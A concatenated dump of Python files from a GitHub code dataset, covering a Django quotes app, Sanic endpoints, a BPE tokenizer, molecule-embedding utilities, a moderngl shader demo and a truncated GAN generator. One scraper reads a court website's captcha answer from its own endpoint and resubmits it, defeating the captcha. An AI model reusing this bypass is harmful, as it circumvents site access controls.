list[Update]):\n await self.rabbit_channel.default_exchange.publish(\n aio_pika.Message(body=bytes(json.dumps(updates), \"utf-8\")), routing_key=self.app.config.rabbit.queue\n )\n","repo_name":"Alsiri0n/amigos","sub_path":"app/store/rabbit/accessor.py","file_name":"accessor.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"31918755247","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\n# import pandas as pd\nheaders ={'User-Agent':'Mozilla/5.0','Referer': 'https://main.sci.gov.in/case-status'}\n\ncaptcha_url ='https://main.sci.gov.in/php/captcha_num.php'\nr = requests.get(captcha_url)\ncap=r.text\n# print(cap)\nfile='data.csv'\n\nwith open(file,'a',newline='') as f:\n writer = csv.DictWriter(f, fieldnames =['Diary No.','Case No.' ,'Present/Last Listed On','Status/Stage','Disp.Type','Category','Act','Petitioner(s)','Respondent(s)','Pet. Advocate(s)','Resp. Advocate(s)','U/Section'])\n writer.writeheader()\n\nfor Dnum in range(1,11):\n for Dyr in range(2000,2021):\n CaseDiaryNumber = {\n \"d_no\": Dnum,\n \"d_yr\":Dyr,\n \"ansCaptcha\":cap\n }\n\n url = 'https://main.sci.gov.in/php/case_status/case_status_process.php'\n\n number =requests.post(url,data=CaseDiaryNumber,headers=headers)\n soup = BeautifulSoup(number.content,'lxml')\n\n tables =soup.find('table')\n td = tables.find_all('td')\n tdata=[]\n for j in range(len(td)):\n if j%2 !=0:\n tdata.append(td[j].text.strip())\n \n with open(file, 'a',newline='') as f:\n writer = csv.writer(f)\n writer.writerow(tdata)\n\n\n\n\n\n\n\n","repo_name":"Rohanmore491/VALUEPITCH_TASK","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"20494744795","text":"from django.shortcuts import render, redirect\nfrom models import User, Quote\nfrom django.contrib import messages\nfrom django.db.models import Count\n\n# Create your views here.\ndef index(request):\n\n return render(request, 'exam/index.html')\n\ndef register(request):\n if request.method == \"POST\":\n user = User.objects.register(request.POST)\n if 'errors' in user:\n for error in user['errors']:\n messages.error(request, error)\n return redirect('/')\n if 'theuser' in user:\n request.session['theuser'] = user['theuser']\n request.session['userid'] = user['userid']\n return redirect('/quotes')\n\ndef login(request):\n if request.method == \"POST\":\n user = User.objects.login(request.POST)\n if 'errors' in user:\n for error in user['errors']:\n messages.error(request, error)\n return redirect('/')\n if 'theuser' in user:\n request.session['theuser'] = user['theuser']\n request.session['userid'] = user['userid']\n return redirect('/quotes')\n\ndef logout(request):\n del request.session['theuser']\n del request.session['userid']\n return redirect('/')\n\ndef quotes(request):\n all_quotes = Quote.objects.exclude(favorite=request.session['userid'])\n favorite_quotes = Quote.objects.filter(favorite=request.session['userid'])\n context={\n 'all' : all_quotes,\n 'fav' : favorite_quotes\n }\n return render(request, 'exam/quotes.html', context)\n\ndef addquote(request):\n if request.method =='POST':\n quote = Quote.objects.add(request.POST, request.session['userid'])\n if 'errors' in quote:\n for error in quote['errors']:\n messages.error(request, error)\n redirect ('/quotes')\n return redirect('/quotes')\n\ndef favorite(request, id):\n this_quote= Quote.objects.get(id=id)\n favorite = User.objects.get(id=request.session['userid'])\n this_quote.favorite.add(favorite)\n this_quote.save()\n return redirect('/quotes')\n\ndef unfavorite(request, id):\n this_quote= Quote.objects.get(id=id)\n favorite = User.objects.get(id=request.session['userid'])\n this_quote.favorite.remove(favorite)\n this_quote.save()\n return redirect('/quotes')\n\ndef user(request, id):\n my_quotes= Quote.objects.filter(posted__id=id)\n context={\n 'quote' :my_quotes,\n 'user' :User.objects.get(id=id),\n 'count' :Quote.objects.annotate(qcount=Count('quote')).filter(posted__id=id)\n }\n return render(request, 'exam/user.html', context)\n","repo_name":"tizme/retake","sub_path":"apps/exam/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"9139953443","text":"\"\"\"Request handlers for the /users endpoint.\"\"\"\n\nfrom sanic import response\nfrom sqlalchemy.exc import IntegrityError\n\nfrom . import APIError, Endpoint\nfrom ...db import user\nfrom ..resource import validate\nfrom ..resource.user import GetUserResponse, PostUsersRequest, PutUserRequest\n\n\nclass UserEndpoint(Endpoint):\n \"\"\"Handles requests to /users/.\"\"\"\n\n __uri__ = \"/users/\"\n\n @validate(None, GetUserResponse)\n async def get(self, _, username):\n \"\"\"Handles a GET /users/ request by returning the user with\n the given username.\"\"\"\n # Fetch user data from DB\n user_data = user.select(self.server.db_session, username)\n if not user_data:\n # Failed to find a user with that username\n raise APIError('No such user', status=404)\n return response.json(user_data, status=200)\n\n @validate(PutUserRequest, GetUserResponse)\n async def put(self, request, username):\n \"\"\"Handles a PUT /users/ request by updating the user with\n the given username and returning the updated user info.\"\"\"\n body = request.json\n updated_user = user.update(\n self.server.db_session,\n username,\n full_name=body.get('full_name', None),\n email=body.get('email', None))\n return response.json(updated_user, status=200)\n\n async def delete(self, _, username):\n \"\"\"Handles a DELETE /users/ request by deleting the user with\n the given username. \"\"\"\n user.delete(self.server.db_session, username)\n return response.text('', status=204)\n\n\nclass UsersEndpoint(Endpoint):\n \"\"\"Handles requests to /users.\"\"\"\n\n __uri__ = '/users'\n\n @validate(PostUsersRequest, None)\n async def post(self, request):\n \"\"\"Handles a POST /users request by creating a new user.\"\"\"\n # Put the user in the DB\n body = request.json\n try:\n user.insert(self.server.db_session, body['full_name'],\n body['username'], body['email'])\n except IntegrityError:\n raise APIError('User already exists', status=400)\n return response.text('', status=201)\n","repo_name":"ginsstaahh/bounce","sub_path":"bounce/server/api/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"29"} +{"seq_id":"34841625769","text":"import numpy as np\nimport torch\nfrom typing import List\nfrom rdkit import Chem\n\nfrom coati.containers.rdkit_utils import mol_to_atoms_coords\nfrom coati.models.encoding.clip_e2e import e3gnn_smiles_clip_e2e\nfrom coati.models.encoding.tokenizers.trie_tokenizer import TrieTokenizer\n\n\ndef embed_points(s: str, encoder: e3gnn_smiles_clip_e2e) -> torch.Tensor:\n V0_atoms, V0_coords = mol_to_atoms_coords(s)\n with torch.no_grad():\n V0 = torch.from_numpy(\n encoder.encode_points(\n torch.tensor(V0_atoms, device=encoder.device).unsqueeze(0).float(),\n torch.tensor(V0_coords, device=encoder.device).unsqueeze(0).float(),\n )\n .detach()\n .cpu()\n .numpy()\n ).cuda()\n return V0\n\n\ndef embed_smiles(\n s: str, encoder: e3gnn_smiles_clip_e2e, tokenizer: TrieTokenizer\n) -> torch.Tensor:\n s = Chem.MolToSmiles(Chem.MolFromSmiles(s))\n with torch.no_grad():\n try:\n batch_tokens = torch.tensor(\n [tokenizer.tokenize_text(\"[SMILES]\" + s + \"[STOP]\", pad=True)],\n device=encoder.device,\n dtype=torch.int,\n )\n batch_embeds = encoder.encode_tokens(batch_tokens, tokenizer)\n except Exception as Ex:\n print(\"embed_smiles exception: \", Ex)\n return batch_embeds[0]\n\ndef embed_smiles_batch(smiles_list: List[str], encoder: e3gnn_smiles_clip_e2e, tokenizer: TrieTokenizer) -> torch.Tensor:\n batch_tokens = torch.tensor(\n [tokenizer.tokenize_text(\"[SMILES]\" + s + \"[STOP]\", pad=True) for s in smiles_list],\n device=encoder.device,\n dtype=torch.int,\n )\n batch_embeds = encoder.encode_tokens(batch_tokens, tokenizer)\n return batch_embeds\n\ndef purify_vector(\n V: torch.Tensor, encoder: e3gnn_smiles_clip_e2e, tokenizer: TrieTokenizer, n_rep=128\n) -> torch.Tensor:\n \"\"\"\n purification is usually the name given to an operation which\n pulls out the idempotent part of a vector under a map.\n\n for example gs dm satisfies P**2 - P =0\n Purification of density matrix:\n min(tr((P^2-p)**2))\n\n Can we purify a coati vector? The issue is the decoding process\n isn't deterministic or differentiable.\n We would like to ensure:\n vector = embed(decode(vector)) which is also:\n 0 = embed(decode(vector)) - vector\n\n Can we enforce this via a gradient like step?\n I'm going to try the punt-version which just pushes vector\n towards the average of embed(decode(vector))\n\n Args:\n V (batch X embed_dim)\n \"\"\"\n with torch.no_grad():\n try:\n regen_smiles = encoder.hclip_to_2d_batch(\n V.to(encoder.device).unsqueeze(0).repeat(n_rep, 1), tokenizer\n )\n except Exception as Ex:\n return V\n batch_tokens_ = []\n for S in regen_smiles:\n try:\n S = Chem.MolToSmiles(Chem.MolFromSmiles(S))\n batch_tokens_.append(\n tokenizer.tokenize_text(\"[SMILES]\" + S + \"[STOP]\", pad=True)\n )\n except Exception as Ex:\n pass\n if len(batch_tokens_) < 1:\n return V\n batch_tokens = torch.tensor(\n batch_tokens_, device=encoder.device, dtype=torch.long\n )\n batch_embeds = encoder.encode_tokens(batch_tokens, tokenizer)\n return batch_embeds.mean(0)\n\n\ndef force_decode_valid(\n V: torch.Tensor,\n encoder: e3gnn_smiles_clip_e2e,\n tokenizer: TrieTokenizer,\n max_attempts: int = 2000,\n) -> str:\n \"\"\"\n Continues decoding until a valid SMILES string is produced.\n \"\"\"\n for attempt in range(max_attempts):\n with torch.no_grad():\n try:\n regen_smiles = encoder.hclip_to_2d(V, tokenizer)\n mol = Chem.MolFromSmiles(regen_smiles)\n if not mol is None:\n return regen_smiles\n except Exception as Ex:\n # print(Ex)\n pass\n return \"C\"\n\n\ndef force_decode_valid_batch(\n V: torch.Tensor,\n encoder: e3gnn_smiles_clip_e2e,\n tokenizer: TrieTokenizer,\n batch_size: int = 128,\n max_attempts: int = 4,\n) -> str:\n \"\"\"\n Attemps multiple parallel decodings until a valid SMILES string is produced.\n If multiple valid SMILES strings are produced, returns the most common one.\n \"\"\"\n for k in range(max_attempts):\n try:\n with torch.no_grad():\n regen_smiles = encoder.hclip_to_2d_batch(\n V.unsqueeze(0).repeat(batch_size, 1), tokenizer\n )\n slist = []\n for S in regen_smiles:\n try:\n mol = Chem.MolFromSmiles(S)\n if not mol is None:\n slist.append(Chem.MolToSmiles(mol))\n except Exception as Ex:\n print(Ex)\n pass\n if len(slist):\n return slist[np.argmax([slist.count(S) for S in slist])]\n else:\n continue\n except Exception as Ex:\n continue\n return \"C\"\n","repo_name":"terraytherapeutics/COATI","sub_path":"coati/generative/coati_purifications.py","file_name":"coati_purifications.py","file_ext":"py","file_size_in_byte":5208,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"29"} +{"seq_id":"3981536890","text":"import struct\n\nclass BPE:\n\tdef __init__(self):\n\t\tself.all_seq = []\n\t\tself.token_to_str = {}\n\t\tself.str_to_token = {}\n\t\tself.splits = set()\n\n\tdef save(self, fname):\n\t\tnum_entries = len(self.token_to_str)\n\t\twith open(fname, 'wb') as fout:\n\t\t\tfout.write(struct.pack('i', num_entries))\n\t\t\tfor t in self.token_to_str:\n\t\t\t\ts = self.token_to_str[t]\n\t\t\t\tfout.write(struct.pack('ii', t, len(s)))\n\t\t\t\tfout.write(s.encode('charmap'))\n\n\tdef load(self, fname):\n\t\tself.token_to_str = {}\n\t\tself.str_to_token = {}\n\t\twith open(fname, 'rb') as fin:\n\t\t\tnum_entries = struct.unpack('i', fin.read(4))[0]\n\t\t\tfor e in range(num_entries):\n\t\t\t\tt, s_len = struct.unpack('ii', fin.read(8))\n\t\t\t\ts = fin.read(s_len).decode('charmap')\n\t\t\t\tself.token_to_str[t] = s\n\t\t\t\tself.str_to_token[s] = t\n\n\tdef encode(self, sentence):\n\t\tall_strs = sorted(self.str_to_token.keys(), key=len, reverse=True)\n\t\ttokens = [sentence]\n\t\tfor s in all_strs:\n\t\t\tneeds_loop = True\n\t\t\twhile needs_loop:\n\t\t\t\tneeds_loop = False\n\t\t\t\tnew_tokens = []\n\t\t\t\tfor t in tokens:\n\t\t\t\t\tif (type(t) is str) and (s in t):\n\t\t\t\t\t\ti = t.index(s)\n\t\t\t\t\t\tj = i + len(s)\n\t\t\t\t\t\tif i > 0:\n\t\t\t\t\t\t\tnew_tokens.append(t[:i])\n\t\t\t\t\t\tnew_tokens.append(self.str_to_token[s])\n\t\t\t\t\t\tif j < len(t):\n\t\t\t\t\t\t\tnew_tokens.append(t[j:])\n\t\t\t\t\t\tneeds_loop = True\n\t\t\t\t\telse:\n\t\t\t\t\t\tnew_tokens.append(t)\n\t\t\t\ttokens = new_tokens\n\t\treturn tokens\n\n\tdef decode(self, tokens):\n\t\treturn ''.join([self.token_to_str[t] for t in tokens])\n\n\tdef add_seq(self, seq):\n\t\ttokens = []\n\t\tfor c in seq:\n\t\t\tif c not in self.str_to_token:\n\t\t\t\tnum_tokens = len(self.token_to_str)\n\t\t\t\tself.str_to_token[c] = num_tokens\n\t\t\t\tself.token_to_str[num_tokens] = c\n\t\t\ttokens.append(self.str_to_token[c])\n\t\tself.all_seq.append(tokens)\n\n\tdef set_merges(self, merges):\n\t\tself.splits = set()\n\t\tfor s in self.str_to_token:\n\t\t\tif s not in merges:\n\t\t\t\tself.splits.add(self.str_to_token[s])\n\n\tdef count_pairs(self):\n\t\tpair_counts = {}\n\t\tfor seq in self.all_seq:\n\t\t\tfor i in range(len(seq) - 1):\n\t\t\t\ta = seq[i]\n\t\t\t\tif a in self.splits:\n\t\t\t\t\tcontinue\n\t\t\t\tb = seq[i + 1]\n\t\t\t\tif b in self.splits:\n\t\t\t\t\tcontinue\n\t\t\t\tpair = (a, b)\n\t\t\t\tif pair not in pair_counts:\n\t\t\t\t\tpair_counts[pair] = 1\n\t\t\t\telse:\n\t\t\t\t\tpair_counts[pair] += 1\n\t\treturn pair_counts\n\n\tdef max_pair(self, pairs):\n\t\tv = list(pairs.values())\n\t\tk = list(pairs.keys())\n\t\treturn k[v.index(max(v))]\n\n\tdef pair_to_str(self, pair):\n\t\treturn self.token_to_str[pair[0]] + self.token_to_str[pair[1]]\n\n\tdef apply_pair_encode(self, pair):\n\t\tnew_token = len(self.token_to_str)\n\t\tnew_str = self.pair_to_str(pair)\n\t\tself.token_to_str[new_token] = new_str\n\t\tself.str_to_token[new_str] = new_token\n\t\tfor i in range(len(self.all_seq)):\n\t\t\tseq = self.all_seq[i]\n\t\t\tnew_seq = []\n\t\t\tj = 0\n\t\t\twhile j < len(seq):\n\t\t\t\tif j < len(seq) - 1 and pair == (seq[j], seq[j + 1]):\n\t\t\t\t\tnew_seq.append(new_token)\n\t\t\t\t\tj += 1\n\t\t\t\telse:\n\t\t\t\t\tnew_seq.append(seq[j])\n\t\t\t\tj += 1\n\t\t\tself.all_seq[i] = new_seq\n\n\tdef embed_step(self):\n\t\tpairs = self.count_pairs()\n\t\tpair = self.max_pair(pairs)\n\t\tprint(self.pair_to_str(pair), pairs[pair])\n\t\tif pairs[pair] > 1:\n\t\t\tself.apply_pair_encode(pair)\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef embed(self, num_tokens):\n\t\twhile len(self.token_to_str) < num_tokens:\n\t\t\tif not self.embed_step():\n\t\t\t\tbreak\n\t\treturn len(self.token_to_str)\n","repo_name":"HackerPoet/ClassMaker","sub_path":"bpe.py","file_name":"bpe.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"29"} +{"seq_id":"799022024","text":"import os\nimport openai\n\n\nopenai.api_key = \"sk-UbuY8SXXXXXX-youropenai-key\"\n\n\nresponse = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\n \"role\": \"system\",\n \"content\": \"As a advance seo blog writer \"\n },\n {\n \"role\": \"user\",\n \"content\": \"write on blog chatgpt\"\n },\n {\n \"role\": \"assistant\",\n \"content\": \"\"\n }\n ],\n temperature=1,\n max_tokens=4000,\n top_p=1,\n frequency_penalty=0,\n presence_penalty=0\n)\n\nprint(response[\"choices\"][0][\"message\"][\"content\"])\n","repo_name":"kumar1shailesh/TextGen-PyChatGpt","sub_path":"TextGen-PyChatGpt-basiccode.py","file_name":"TextGen-PyChatGpt-basiccode.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"39142225696","text":"\n'''\nExample of using shader storage buffer in compute shader.\nWe read from a buffer and write the result to another buffer.\nEvery frame we swap the buffers around transforming positions\nof balls.\n\nBuffer.bind_to_storage_buffer is used to bind a buffer as storage buffer\nto a specific binding point specified in the compute program.\n\nIn addition we render the balls using a geometry shader to easily\nbatch draw them all in one render call.\n\nauthor: minu jeong\nmodified by: einarf\n'''\nimport math\nimport random\nimport numpy as np\nfrom ported._example import Example\n\n\nitems_vertex_shader_code = \"\"\"\n #version 430\n\n in vec4 in_vert;\n in vec4 in_col;\n\n out vec4 v_color;\n\n void main()\n {\n gl_Position = in_vert; // x, y, 0, radius\n v_color = in_col;\n }\n \"\"\"\n\n# Geometry shader turning the points into triangle strips.\n# This can also be done with point sprites.\nitems_geo_shader = \"\"\"\n #version 330\n\n layout(points) in;\n layout(triangle_strip, max_vertices=4) out;\n\n in vec4 v_color[];\n out vec2 uv;\n out vec4 color;\n\n void main() {\n float radius = gl_in[0].gl_Position.w;\n vec2 pos = gl_in[0].gl_Position.xy;\n\n // Emit the triangle strip creating a \"quad\"\n // Lower left\n gl_Position = vec4(pos + vec2(-radius, -radius), 0, 1);\n color = v_color[0];\n uv = vec2(0, 0);\n EmitVertex();\n\n // upper left\n gl_Position = vec4(pos + vec2(-radius, radius), 0, 1);\n color = v_color[0];\n uv = vec2(0, 1);\n EmitVertex();\n\n // lower right\n gl_Position = vec4(pos + vec2(radius, -radius), 0, 1);\n color = v_color[0];\n uv = vec2(1, 0);\n EmitVertex();\n\n // upper right\n gl_Position = vec4(pos + vec2(radius, radius), 0, 1);\n color = v_color[0];\n uv = vec2(1, 1);\n EmitVertex();\n\n EndPrimitive();\n }\n\"\"\"\n\nitems_fragment_shader_code = \"\"\"\n #version 430\n\n in vec2 uv;\n in vec4 color;\n out vec4 out_color;\n void main()\n {\n // Calculate the length from the center of the \"quad\"\n // using texture coordinates discarding fragments\n // further away than 0.5 creating a circle.\n if (length(vec2(0.5, 0.5) - uv.xy) > 0.5)\n {\n discard;\n }\n out_color = color;\n }\n\"\"\"\n\n# calc position with compute shader\ncompute_worker_shader_code = \"\"\"\n#version 430\n#define GROUP_SIZE %COMPUTE_SIZE%\n\nlayout(local_size_x=GROUP_SIZE) in;\n\n// All values are vec4s because of block alignment rules (keep it simple).\n// We could also declare all values as floats to make it tightly packed.\n// See : https://www.khronos.org/opengl/wiki/Interface_Block_(GLSL)#Memory_layout\nstruct Ball\n{\n vec4 pos; // x, y, 0, radius\n vec4 vel; // x, y (velocity)\n vec4 col; // r, g, b (color)\n};\n\nlayout(std430, binding=0) buffer balls_in\n{\n Ball balls[];\n} In;\nlayout(std430, binding=1) buffer balls_out\n{\n Ball balls[];\n} Out;\n\nvoid main()\n{\n int x = int(gl_GlobalInvocationID);\n\n Ball in_ball = In.balls[x];\n\n vec4 p = in_ball.pos.xyzw;\n vec4 v = in_ball.vel.xyzw;\n\n p.xy += v.xy;\n\n float rad = p.w * 0.5;\n if (p.x - rad <= -1.0)\n {\n p.x = -1.0 + rad;\n v.x *= -0.98;\n }\n else if (p.x + rad >= 1.0)\n {\n p.x = 1.0 - rad;\n v.x *= -0.98;\n }\n\n if (p.y - rad <= -1.0)\n {\n p.y = -1.0 + rad;\n v.y *= -0.98;\n }\n else if (p.y + rad >= 1.0)\n {\n p.y = 1.0 - rad;\n v.y *= -0.98;\n }\n v.y += -0.001;\n\n Ball out_ball;\n out_ball.pos.xyzw = p.xyzw;\n out_ball.vel.xyzw = v.xyzw;\n\n vec4 c = in_ball.col.xyzw;\n out_ball.col.xyzw = c.xyzw;\n\n Out.balls[x] = out_ball;\n}\n\"\"\"\n\nclass ComputeShaderSSBO(Example):\n title = \"Compute Shader SSBO\"\n gl_version = 4, 3 # Required opengl version\n window_size = 600, 600 # Initial window size\n aspect_ratio = 1.0 # Force viewport aspect ratio (regardless of window size)\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.COUNT = 256 # number of balls\n self.STRUCT_SIZE = 12 # number of floats per item/ball\n\n # Program for drawing the balls / items\n self.program = self.ctx.program(\n vertex_shader=items_vertex_shader_code,\n geometry_shader=items_geo_shader,\n fragment_shader=items_fragment_shader_code\n )\n\n # Load compute shader\n compute_shader_code_parsed = compute_worker_shader_code.replace(\"%COMPUTE_SIZE%\", str(self.COUNT))\n self.compute_shader = self.ctx.compute_shader(compute_shader_code_parsed)\n\n # Create the two buffers the compute shader will write and read from\n compute_data = np.fromiter(self.gen_initial_data(), dtype=\"f4\")\n self.compute_buffer_a = self.ctx.buffer(compute_data)\n self.compute_buffer_b = self.ctx.buffer(compute_data)\n\n # Prepare vertex arrays to drawing balls using the compute shader buffers are input\n # We use 4x4 (padding format) to skip the velocity data (not needed for drawing the balls)\n self.balls_a = self.ctx.vertex_array(\n self.program, [(self.compute_buffer_a, '4f 4x4 4f', 'in_vert', 'in_col')],\n )\n self.balls_b = self.ctx.vertex_array(\n self.program, [(self.compute_buffer_b, '4f 4x4 4f', 'in_vert', 'in_col')],\n )\n\n def gen_initial_data(self):\n \"\"\"Generator function creating the initial buffer data\"\"\"\n for i in range(self.COUNT):\n _angle = (i / self.COUNT) * math.pi * 2.0\n _dist = 0.125\n radius = random.random() * 0.01 + 0.01\n # position and radius (vec4)\n yield math.cos(_angle) * _dist\n yield math.sin(_angle) * _dist\n yield 0.0\n yield radius\n # velocity (vec4)\n _v = random.random() * 0.005 + 0.01\n yield math.cos(_angle) * _v\n yield math.sin(_angle) * _v\n yield 0.0\n yield 0.0\n # color (vec4)\n yield 1.0 * random.random()\n yield 1.0 * random.random()\n yield 1.0 * random.random()\n yield 1.0\n\n\n def render(self, time, frame_time):\n # Calculate the next position of the balls with compute shader\n self.compute_buffer_a.bind_to_storage_buffer(0)\n self.compute_buffer_b.bind_to_storage_buffer(1)\n self.compute_shader.run(group_x=self.STRUCT_SIZE)\n\n # Batch draw the balls\n self.balls_b.render(mode=self.ctx.POINTS)\n\n # Swap the buffers and vertex arrays around for next frame\n self.compute_buffer_a, self.compute_buffer_b = self.compute_buffer_b, self.compute_buffer_a\n self.balls_a, self.balls_b = self.balls_b, self.balls_a\n\n\nif __name__ == \"__main__\":\n ComputeShaderSSBO.run()\n","repo_name":"moderngl/moderngl","sub_path":"examples/compute_shader_ssbo.py","file_name":"compute_shader_ssbo.py","file_ext":"py","file_size_in_byte":6861,"program_lang":"python","lang":"en","doc_type":"code","stars":1670,"dataset":"github-code","pt":"29"} +{"seq_id":"556787597","text":"\r\n#Code chef Problem https://www.codechef.com/LRNDSA05/problems/ZACKHAN\r\nt=int(input())\r\n\r\n\r\ndef gcd(a, b):\r\n # Everything divides 0\r\n if (a%b == 0):\r\n return b\r\n return gcd(b, a % b)\r\n\r\nfor x in range(t):\r\n\r\n m,n=(input().split())\r\n m=int(m)\r\n n=int(n)\r\n g=gcd(m,n)\r\n print(g)","repo_name":"vinaysr93/Pythonpracticeprograms","sub_path":"zack and handkerchieves.py","file_name":"zack and handkerchieves.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"30791984092","text":"\"\"\"\n进行血管树的生成代码\n\"\"\"\n\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom A_6DataEnhance import select_axis\nfrom C_Func import CrashBranchRemove, GrowSeqSort, get_condition, get_coord_seg, Cal_Error, \\\n angle_determine, Gen_Rotate, CrashDetection, SegExtract\nfrom C_GetEntrance import CoordTrans_R\nfrom scipy import io\n\n\ndef plot_tree(Tree_Data, Coord_Data, Tree_Num, path):\n x_list = []\n y_list = []\n\n for i in range(len(Coord_Data)):\n Coord_x = Coord_Data[i][0]\n Coord_y = Coord_Data[i][1]\n for j in Coord_x:\n x_list.append(j)\n for j in Coord_y:\n y_list.append(j)\n\n dpi = 600\n umpp = 1\n fig = plt.figure(figsize=((max(x_list) - min(x_list)) / dpi, (max(y_list) - min(y_list)) / dpi))\n ax = fig.add_axes([0, 0, 1, 1])\n\n for j in range(len(Tree_Data)):\n # linewidth单位为points,1 point = 1/72 inch, 1 inch = dpi pixels, 1 pixel = umpp um (umpp: um per pixel)\n # 则管径为D um的血管段,画图时对应的linewidth为72 /(umpp*dpi) * D\n ax.plot(Coord_Data[j][0], Coord_Data[j][1], 'k-', linewidth=72 / (dpi * umpp) * Tree_Data[j][3])\n\n ax.axis('off')\n plt.xlim(min(x_list), max(x_list))\n plt.ylim(min(y_list), max(y_list))\n\n plt.savefig('%s/Tree_%s_%d.tiff' % (path, net, Tree_Num), dpi=dpi, pil_kwargs={\"compression\": \"tiff_lzw\"})\n plt.close()\n\n\ndef deconv(inputs, shape, strides, out_shape, is_sn=False, padding=\"SAME\"):\n filters = tf.get_variable(\"kernel\", shape=shape, initializer=tf.random_normal_initializer(stddev=0.02))\n bias = tf.get_variable(\"bias\", shape=[shape[-2]], initializer=tf.constant_initializer([0]))\n if is_sn:\n return tf.nn.conv2d_transpose(inputs, spectral_norm(\"sn\", filters), out_shape, strides, padding) + bias\n else:\n return tf.nn.conv2d_transpose(inputs, filters, out_shape, strides, padding) + bias\n\n\ndef conv(inputs, shape, strides, is_sn=False, padding=\"SAME\"):\n filters = tf.get_variable(\"kernel\", shape=shape, initializer=tf.random_normal_initializer(stddev=0.02))\n bias = tf.get_variable(\"bias\", shape=[shape[-1]], initializer=tf.constant_initializer([0]))\n if is_sn:\n return tf.nn.conv2d(inputs, spectral_norm(\"sn\", filters), strides, padding) + bias\n else:\n return tf.nn.conv2d(inputs, filters, strides, padding) + bias\n\n\ndef fully_connected(inputs, num_out, is_sn=False):\n W = tf.get_variable(\"W\", [inputs.shape[-1], num_out], initializer=tf.random_normal_initializer(stddev=0.02))\n b = tf.get_variable(\"b\", [num_out], initializer=tf.constant_initializer([0]))\n if is_sn:\n return tf.matmul(inputs, spectral_norm(\"sn\", W)) + b\n else:\n return tf.matmul(inputs, W) + b\n\n\ndef leaky_relu(inputs, slope=0.2):\n return tf.maximum(slope * inputs, inputs)\n\n\ndef spectral_norm(name, w, iteration=1):\n # Spectral normalization which was published on ICLR2018,please refer to \"https://www.researchgate.net/publication/318572189_Spectral_Normalization_for_Generative_Adversarial_Networks\"\n # This function spectral_norm is forked from \"https://github.com/taki0112/Spectral_Normalization-Tensorflow\"\n w_shape = w.shape.as_list()\n w = tf.reshape(w, [-1, w_shape[-1]])\n with tf.variable_scope(name, reuse=False):\n u = tf.get_variable(\"u\", [1, w_shape[-1]], initializer=tf.truncated_normal_initializer(), trainable=False)\n u_hat = u\n v_hat = None\n\n def l2_norm(v, eps=1e-12):\n return v / (tf.reduce_sum(v ** 2) ** 0.5 + eps)\n\n for i in range(iteration):\n v_ = tf.matmul(u_hat, tf.transpose(w))\n v_hat = l2_norm(v_)\n u_ = tf.matmul(v_hat, w)\n u_hat = l2_norm(u_)\n sigma = tf.matmul(tf.matmul(v_hat, w), tf.transpose(u_hat))\n w_norm = w / sigma\n with tf.control_dependencies([u.assign(u_hat)]):\n w_norm = tf.reshape(w_norm, w_shape)\n return w_norm\n\n\ndef bn(inputs):\n mean, var = tf.nn.moments(inputs, axes=[1, 2], keep_dims=True)\n scale = tf.get_variable(\"scale\", shape=mean.shape, initializer=tf.constant_initializer([1.0]))\n shift = tf.get_variable(\"shift\", shape=mean.shape, initializer=tf.constant_initializer([0.0]))\n return (inputs - mean) * scale / (tf.sqrt(var + epsilon)) + shift\n\n\ndef conv_cond_concat(x, y):\n \"\"\"Concatenate conditioning vector on feature map axis.\"\"\"\n x_shapes = x.get_shape()\n y_shapes = y.get_shape()\n return tf.concat([x, y * tf.ones([x_shapes[0], x_shapes[1], x_shapes[2], y_shapes[3]])], 3)\n\n\nclass Generator:\n def __init__(self, name):\n self.name = name\n\n def __call__(self, Z, label, reuse=False):\n with tf.variable_scope(name_or_scope=self.name, reuse=reuse):\n # linear\n Z = tf.concat([Z, label], 1)\n label_ = tf.reshape(label, [batch_size, 1, 1, classfied_num])\n\n with tf.variable_scope(name_or_scope=\"train\"):\n # fully connected layer for generator\n with tf.variable_scope(name_or_scope=\"gfc\"):\n output = fully_connected(Z, 5 * 4 * 1024)\n output = tf.nn.relu(output)\n output = tf.reshape(output, [batch_size, 5, 4, 1024])\n output = conv_cond_concat(output, label_)\n\n # deconv1\n # deconv(inputs, filter_shape, strides, out_shape, is_sn, padding=\"SAME\")\n with tf.variable_scope(name_or_scope=\"deconv1\"):\n output = deconv(output, [3, 3, 512, (1024 + classfied_num)], [1, 1, 1, 1], [batch_size, 5, 4, 512],\n padding=\"SAME\")\n output = bn(output)\n output = tf.nn.relu(output)\n\n # deconv2\n with tf.variable_scope(name_or_scope=\"deconv2\"):\n output = deconv(output, [3, 3, 256, 512], [1, 1, 2, 1], [batch_size, 5, 8, 256], padding=\"SAME\")\n output = bn(output)\n output = tf.nn.relu(output)\n\n # deconv3\n with tf.variable_scope(name_or_scope=\"deconv3\"):\n output = deconv(output, [3, 3, 128, 256], [1, 1, 2, 1], [batch_size, 5, 16, 128], padding=\"SAME\")\n output = bn(output)\n output = tf.nn.relu(output)\n\n # deconv4\n with tf.variable_scope(name_or_scope=\"deconv4\"):\n output = deconv(output, [3, 3, channel, 128], [1, 2, 2, 1], [batch_size, width, height, channel],\n padding=\"SAME\")\n output = tf.nn.tanh(output)\n\n return output\n\n @property\n def var(self):\n return 